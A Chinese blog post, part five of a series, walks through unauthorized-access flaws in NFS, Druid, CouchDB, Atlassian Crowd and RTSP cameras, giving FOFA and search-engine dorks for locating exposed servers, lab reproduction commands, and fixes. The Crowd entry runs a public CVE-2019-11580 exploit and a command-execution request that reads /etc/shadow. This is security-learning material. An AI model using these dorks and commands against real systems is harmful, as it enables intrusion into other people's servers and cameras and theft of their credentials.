首页 > 其他分享 >三十种未授权访问漏洞复现 合集( 五 )

三十种未授权访问漏洞复现 合集( 五 )

时间:2024-08-05 21:25:12浏览次数:17  
标签:三十种 访问 Druid druid 漏洞 html 复现 授权 合集

 未授权访问漏洞介绍

        未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。---->目录遍历
        目前主要存在未授权访问漏洞的有:NFS服务,Samba服务,LDAP,Rsync,FTPGitLab, Jenkins,MongoDB, Redis, ZooKeeper, ElasticSearch, Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo 等...
        未授权访问漏洞的复现思路:
        1.使用靶场进行漏洞复现:(1)vulhub(2)本地搭建靶场
        2.使用漏洞扫描工具进行扫描(1)github-功能受限(2)Python-定制化的完成漏洞扫描的利用


二十一:NSF共享目录未授权访问

》》》漏洞简介《《《

Network File System(NFS),是由SUN公司研制的UNIX表示层协议(pressentation layerprotocol),能使使用者访问网络上别处的文件就像在使用自己的计算机一样。服务器在启用nfs服务以后,由于nfs服务未限制对外访问,导致共享目录泄漏。

》》》漏洞复现《《《

fofa搜索语句:"nfs"       port="2049"     port="20048"

#安装nfs客户端

apt install nfs-common

#查看nfs服务器上的共享目录

showmount -e 192.168.126.130
#挂载相应共享目录到本地

mount -t nfs 192.168.126.130:/grdata /mnt
#卸载目录

umount /mnt

》》》漏洞修复建议《《《

1.利用iptables限制端口2049和20048端口的访问,禁止外部访问;

2.设置/etc/exports,对访问进行控制;


二十二:Druid未授权访问漏洞

》》》漏洞简介《《《

Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。

当开发者配置不当时就可能造成未授权访问下面给出常见Druid未授权访问路径

漏洞特征:http://www.xxxx.com/druid/index.html

/druid/websession.html

/system/druid/websession.html

/webpage/system/druid/websession.html(jeecg)

》》》漏洞复现《《《

fofa语句:title="Druid Stat Index"

# PHPINFO页面
inurl:phpinfo.php

intitle:phpinfo()

info.php test.php
# Druid未授权访问

inurl:"druid/index.html"

intitle:"Druid Stat Index'

直接在网站的url中后加上:

1 /druid/index.html

2 /druid/websession.html

3 /druid/datasource.html

4 /druid/sql.html

5 /druid/spring.html

如果可以无需登录,即可登录到Druid监控界面,则说明该网站存在Druid未授权访问漏洞

》》》漏洞修复建议《《《

1.配置访问账号密码。
2.禁止对外网开放访问。


二十三:CouchDB未授权访问

》》》漏洞简介《《《

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是-个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NOSQL数据库。应用广泛,如BBC用在其动态内容展示平台,CreditSuisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)
在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。默认端口是6984
影响版本:小于 1.7.0 以及 小于 2.1.1

》》》漏洞复现《《《

fofa语法

(port="5984")&&(is_honeypot=false && is_fraud=false)

Vulhub靶场

cd /vulhub/couchdb/CVE-2017-12636

docker-compose up -d

执行未授权访问测试命令..

curl 192.168.1.4:5984

curl 192.168.1.4:5984/_config

》》》漏洞修复建议《《《

1.指定CouchDB绑定的IP (需要重启CouchDB才能生效)在/etc/couchdb/local.ini 文件中找到“bind address=0.0.0.0”,把 0.0.0.0修改为 127.0.0.1 ,然后保存。 注:修改后只有本机才能访问CouchDB。

2.设置访问密码(需要重启CouchDB才能生效)在 /etc/couchdb/local.ini 中找到“[admins”字段配置密码。

3.设置WWW-Authenticate,强制认证。


二十四:Altassian Crowd未授权访问漏洞

》》》漏洞简介《《《

Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品。Atlassian Crowd是一套基于Web的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center是Crowd的集群部署版。AtlassianCrowd和Crowd Data Center在其某些发行版本中错误地启用了pdkinstall开发插件,使其存在安全漏洞。攻击者利用该漏洞可在未授权访问的情况下对Atlassian Crowd和Crowd DataCenter安装任意的恶意插件,执行任意代码/命令,从而获得服务器权限。其端口:8095

》》》漏洞复现《《《

影响版本

2.1.0 <= version < 3.0.5
3.1.0 <= version < 3.1.6

3.2.0<= version < 3.2.8

3.3.0 <= version < 3.3.5

3.4.0 <= version < 3.4.4

漏洞利用脚本github地址:https://github.com/jas502n/CVE-2019-11580

1 git clone https://github.com/jas502n/CVE-2019-11580

2 cd CVE-2019-11580/

3 python CVE-2019-11580.py http://192.168.18.138:8095

4 curl http://192.168.18.138:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow

》》》漏洞修复建议《《《

设置访问/crowd/admin/uploadplugin.action的源ip.
升级最新版本(3.5.0以上)。


二十五:RTSP未授权访问漏洞

》》》漏洞简介《《《

RTSP(Real Time Streaming Protocol),实时流传输协议,是TCP/IP协议体系中的一个应用层协议,该协议定义了一对多应用程序如何有效地通过IP网络传送多媒体数据,被广泛用于视频直播领域,为方便用户远程监控摄像头内容,许多摄像头厂商会在摄像头或NVR中开启RTSP服务器。攻击者可通过VLC等视频播放软件打开rtsp地址进行摄像头画面的实时查看。

》》》漏洞复现《《《

fofa语句:(port=“554")&&(is_honeypot=false && is_fraud=false)&& protocol="rtsp"

》》》漏洞修复建议《《《

1.修改默认口令。
2.禁止开放到外网。

标签:三十种,访问,Druid,druid,漏洞,html,复现,授权,合集
From: https://blog.csdn.net/qq_48368964/article/details/140909335

相关文章

  • 复现opendrivelab的“点云预测”项目
    本文的主要工作就是复现下述论文中的算法。该论文全称:VisualPointCloudForecasting论文内容在此不做过多介绍,直接上项目。一、准备工作首先通读readme.md文件的内容,了解所需要的相关依赖和数据等内容。一定要多读几遍,不要扫一眼就过了。接下来就是部署环境,根据readme......
  • SourceCodester v1.0 SQL 注入漏洞(CVE-2023-2130)靶场复现
    SourceCodesterPurchaseOrderManagementSystemv1.0是一个实用的工具,适合希望优化采购流程的企业和组织靶场界面直接放sqlmap跑爆数据库爆数据表爆字段爆内容-用户名爆内容-密码sqlmap的md5碰撞sqlmap所有命令点击查看代码爆数据库pythonsqlmap.py-u......
  • firewall通用指令合集
    常用指令查看防火墙状态firewall-cmd--state停止firewallsystemctlstopfirewalld.service禁止开机启动systemctldisablefirewalld.service开放某个服务端口--允许所有IP访问firewall-cmd--add-port=16379/tcp--permanent移除6379端口-禁止访问fir......
  • Jorani远程命令执行漏洞 CVE-2023-26469靶场复现
    靶场界面点击查看exp↓↓↓"""vulnerabilitycoveredbyCVE-2023-26469"""importreadlineimportrequestsimportdatetimeimportsysimportreimportbase64importrandomimportstringrequests.packages.urllib3.disable_warnings(requ......
  • 易捷OA协同办公软件 ShowPic 任意文件读取漏洞复现
    0x01产品简介易捷OA协同办公软件是在“让管理更简单”和“实时协同”的理念的指导下,”本着“简约、实时、快捷、省钱”的产品定位,结合数千家客户的管理实践和当前最先进的IT技术开发出来的全新一代协同产品,在云计算、全文检索、手机应用、企业即时通讯等多方面取得突破性创新......
  • 【漏洞复现】LiveBOS UploadFile.do 任意文件上传漏洞(XVE-2023-21708)
    0x01产品简介LiveBOS(LiveBusinessObjectSystem)是顶点软件自主研发的以业务对象建模为核心的业务中间件及其集成开发工具,它通过业务模型建立直接完成软件开发的创新模式,支持各类基于WEB的专业应用软件与行业大型应用的开发。LiveBOS系统由三个相对独立的产品构成:运行支......
  • 方天云智慧平台系统 GetSalQuatation SQL注入漏洞复现
    0x01产品简介方天云智慧平台系统,作为方天科技公司的重要产品,是一款面向企业全流程的业务管理功能平台,集成了ERP(企业资源规划)、MES(车间执行系统)、APS(先进规划与排程)、PLM(产品生命周期)、CRM(客户关系管理)等多种功能模块,旨在通过云端服务为企业提供数字化、智能化的管理解决方案......
  • 未授权访问漏洞(漏洞复现合集)
    目录一:Redis未授权访问漏洞*步骤一:进入vulhub目录使用以下命令启动靶机...步骤二:在Kali上安装redis程序进行服务的链接步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞...下载以下攻击项目...步骤四:使用工具执行以下命令获取目标的命令执行环境,交互......
  • CVE-2023-26469 复现
    题目描述:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在Jorani1.0.0中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。这是一个csrf的洞,找了一下,......
  • CVE-2022-4230 复现
    题目描述:WPStatisticsWordPress插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行SQL注入攻击。默认情况下,具有管理选项功能(admin+)的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。根据描述,我们直接去查看wp-admin路......